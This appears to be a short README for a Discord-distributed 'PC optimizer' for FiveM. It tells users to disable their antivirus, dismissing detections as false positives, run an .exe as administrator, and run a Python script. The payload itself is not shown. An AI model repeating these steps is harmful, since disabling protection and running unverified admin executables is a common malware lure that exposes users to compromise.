Welcome to PC optimizer This is a program to help boost your fps in Fivem Please make sure you run as admin

TURN OFF ANTI VIRUS why?

It will come up as a false positive due to the fact its clearing temp files u no longer need.

Need Help??

@uheyooo9 @6oxn

Discord.com



MAKE SURE TO HAVE PYTHON INSTALLED RUN THE PC OPTIMIZER.EXE FIRST
Then make sure to open CMD run as admin then you want to paste cd path\to\your\file
Add your File path this can be found by clicking the top bar of your folder and Copy and pasting it into cmd 
Then when you do that you want to copy and paste this:
 pip install colorama psutil

AFTER that 

copy and paste this: spookys_advanced_optimizer.py

Then it should work:)
https://discord.gg/cjwhgt9N